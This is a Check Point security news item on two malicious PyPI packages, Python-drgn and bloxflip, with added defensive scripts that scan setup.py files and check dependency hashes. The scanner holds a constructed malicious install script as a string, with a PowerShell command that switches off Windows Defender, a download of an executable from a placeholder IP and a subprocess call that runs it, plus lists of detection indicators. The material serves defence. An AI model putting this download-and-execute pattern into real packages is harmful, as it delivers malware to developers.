Two Malicious Code Packages Designed for Data Compromise Identified

February 2023 by Check Point

Check Point Research (CPR) warns of malicious code package attacks through third-party repositories such as PyPI. CPR recently prevented two such attacks, involving the packages Python-drgn and bloxflip. These attacks can have serious consequences, including data compromise, operational disruption and reputation damage. Threat actors treat package repositories as a reliable and scalable malware distribution channel.

• Python-drgn is a malicious package that was uploaded to PyPI on August 8, 2022.
• Bloxflip disables Windows Defender to avoid detection.
• CPR shares screenshots of malicious code and provides safety tips.

Check Point Research (CPR) has prevented two recent code package attacks. Code package supply chain attacks involve publishing malicious packages, or injecting malicious code into legitimate ones, that are then distributed through online code repositories and package managers.

This attack vector exploits the trust developers place in third-party repositories and the vast ecosystem of open-source dependencies they pull in.

Python-drgn on PyPI
Python-drgn is a malicious package that was uploaded to PyPI on August 8, 2022. Using Python-drgn, the attackers can collect private data from many users and abuse it in several ways:
• Selling the information.
• Identity theft.
• Account takeover.
• Collecting information about the victim's company.

Bloxflip on PyPI
Another malicious package our engines detected is bloxflip. First, it disables Windows Defender to avoid detection. Then it downloads an executable from the web using a Python HTTP 'get' call. Finally, it spawns a subprocess that runs the downloaded executable inside the developer's environment.
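The three steps described above (tamper with Defender, fetch an executable, run it in a subprocess) are install-time behaviour that a pre-install scanner can flag in a package's setup.py before it ever executes. The script below is an added example written for this page; it is not Check Point's detection engine and not the bloxflip package's code. It parses a constructed setup.py with Python's ast module and records calls to HTTP-fetch and process-spawn APIs, plus string constants that reference Defender tampering. The sample scripts, the indicator sets and the Set-MpPreference string are assumptions chosen to illustrate the behaviour class the article describes, not recovered from the real package.

```python
from __future__ import annotations

import ast
from dataclasses import dataclass
from typing import List

# Constructed sample install script modelled on the three behaviours the article
# attributes to bloxflip (tamper with Defender, fetch an executable, run it).
# It is NOT the real package's code; the Defender command is an assumption used
# only as an indicator string.
SUSPICIOUS_SETUP_PY = '''
import os
import subprocess
import requests
from setuptools import setup

def _stage():
    os.system("powershell -c Set-MpPreference -DisableRealtimeMonitoring $true")
    resp = requests.get("http://203.0.113.10/update.exe")
    with open("update.exe", "wb") as fh:
        fh.write(resp.content)
    subprocess.Popen(["update.exe"])

_stage()
setup(name="bloxflip", version="0.1.0")
'''

# Constructed benign script for comparison.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="goodpkg", version="1.0.0", packages=["goodpkg"])
'''

# Indicator sets (assumed, not exhaustive). Bare names cover
# "from subprocess import Popen" style imports.
NETWORK_FETCH = {
    "requests.get", "urllib.request.urlopen", "urllib.request.urlretrieve",
    "urlopen", "urlretrieve",
}
PROCESS_EXEC = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen", "os.startfile", "Popen",
}
# Substrings suggesting anti-AV tampering; matched case-insensitively.
DEFENDER_MARKERS = (
    "set-mppreference", "disablerealtimemonitoring", "windows defender", "windefend",
)


@dataclass
class Finding:
    kind: str
    line: int
    detail: str


def _dotted_name(node: ast.AST) -> str | None:
    """Render Name/Attribute chains such as subprocess.Popen as a dotted string."""
    parts: List[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source: str, filename: str = "setup.py") -> List[Finding]:
    """Walk the AST and record every call or string matching an indicator set."""
    tree = ast.parse(source, filename)
    findings: List[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in NETWORK_FETCH:
                findings.append(Finding("network_fetch", node.lineno, name))
            elif name in PROCESS_EXEC:
                findings.append(Finding("process_exec", node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.lower()
            hit = next((m for m in DEFENDER_MARKERS if m in text), None)
            if hit:
                findings.append(Finding("defender_tamper", node.lineno, hit))
    return findings


def verdict(findings: List[Finding]) -> str:
    """block on AV tampering or fetch+exec together; review on any single indicator."""
    kinds = {f.kind for f in findings}
    if "defender_tamper" in kinds or {"network_fetch", "process_exec"} <= kinds:
        return "block"
    return "review" if kinds else "allow"


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        found = scan_source(src)
        print(label, verdict(found))
        for f in found:
            print(f"  line {f.line}: {f.kind} ({f.detail})")
```

A static pass like this is cheap to run on every wheel or sdist before it enters a build, but it only catches what is visible in the source: obfuscated strings, exec of decoded payloads or downloads in a compiled extension will slip past it, so treat a clean result as "no obvious indicators", not as a clean bill of health.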

Quote: Lee Levi, Team Leader, Mail Security at Check Point
“Code package supply chain attacks have increased significantly in recent years. Here, attackers publish malicious packages or inject malicious code into legitimate code packages distributed through online code repositories and package managers. These attacks can have serious consequences, including data compromise, operational disruption, and reputation damage. Today, we’re showing two examples of where we recently prevented code package attacks. The first one is Python-drgn on PyPI, where the attackers could collect private data of multiple users. The second one is bloxflip, which disables Windows Defender to avoid detection. From an attacker’s perspective, package repositories are a reliable and scalable malware distribution channel. We warn the public to exercise cyber safety by verifying the legitimacy of all source code acquired from 3rd parties.”

Cyber Safety Tips
• Verify the legitimacy of all source code acquired from third parties, whether for internal use or for bundling with other products or services.
• Encrypt sensitive data both in transit and at rest.
• Perform periodic audits of the code packages you use and validate that they are the correct versions and are commonly used.
• Use CISA best practices to deploy safer and more secure behaviors across your organization.
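The audit tip above, validating that the packages you use are the correct versions, can be enforced mechanically rather than by eye: pin every dependency to the content hash of the artifact that was reviewed, and refuse to install anything whose bytes do not match. The script below is an added example for this page, not Check Point's tooling. It parses pip's --hash=sha256: lock syntax and checks a downloaded artifact against it, distinguishing an unpinned name, a version drift and a tampered file. The wheel bytes and the lock entry are constructed inline (the digest is computed from the constructed bytes so the example runs offline); the package name is invented.

```python
import hashlib
import re
from typing import Dict, Set, Tuple

# Constructed stand-ins for downloaded wheel files (real wheels are zip archives;
# only the bytes matter for hash pinning). "examplepkg" is not a real package.
GOOD_WHEEL = b"PK\x03\x04 constructed wheel bytes for examplepkg 1.4.0"
TAMPERED_WHEEL = GOOD_WHEEL + b"\n# appended payload"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def normalize(name: str) -> str:
    """PEP 503 name normalisation: 'Python_DRGN' and 'python-drgn' map to one key."""
    return re.sub(r"[-_.]+", "-", name).lower()


# Constructed lock file in pip's --hash syntax. The digest is derived from GOOD_WHEEL
# so the example is self-contained; in practice the lock is generated once at review
# time (for example with pip-compile --generate-hashes) and committed to the repo.
LOCKFILE = f"""
# pinned after review (constructed)
examplepkg==1.4.0 --hash=sha256:{sha256_hex(GOOD_WHEEL)}
"""

LOCK_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>[^\s]+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$"
)

# (normalised name, version) -> set of acceptable sha256 digests
Lock = Dict[Tuple[str, str], Set[str]]


def parse_lock(text: str) -> Lock:
    """Parse pinned lines; a line without a hash is rejected rather than trusted."""
    lock: Lock = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = LOCK_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable or unhashed lock line: {raw!r}")
        digests = set(re.findall(r"--hash=sha256:([0-9a-f]{64})", m.group("hashes")))
        lock[(normalize(m.group("name")), m.group("version"))] = digests
    return lock


def check_download(lock: Lock, name: str, version: str, data: bytes) -> str:
    """Return 'ok', 'not-pinned', 'version-mismatch' or 'hash-mismatch'."""
    key = normalize(name)
    if not any(n == key for (n, _v) in lock):
        return "not-pinned"          # never reviewed: refuse, do not silently add
    if (key, version) not in lock:
        return "version-mismatch"    # version drifted from the reviewed pin
    if sha256_hex(data) not in lock[(key, version)]:
        return "hash-mismatch"       # same name and version, different bytes
    return "ok"


if __name__ == "__main__":
    lock = parse_lock(LOCKFILE)
    for label, name, version, data in (
        ("reviewed artifact", "ExamplePkg", "1.4.0", GOOD_WHEEL),
        ("tampered artifact", "examplepkg", "1.4.0", TAMPERED_WHEEL),
        ("newer version", "examplepkg", "1.5.0", GOOD_WHEEL),
        ("look-alike name", "example-pkg", "1.4.0", GOOD_WHEEL),
    ):
        print(f"{label:18s} -> {check_download(lock, name, version, data)}")
```

pip enforces the same discipline natively with pip install --require-hashes -r requirements.txt, which fails the whole install if any requirement lacks a hash or any download does not match; the value of writing the check out is seeing that a look-alike name, a version bump and a modified artifact are three different failures, each of which should stop the build rather than be waved through.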

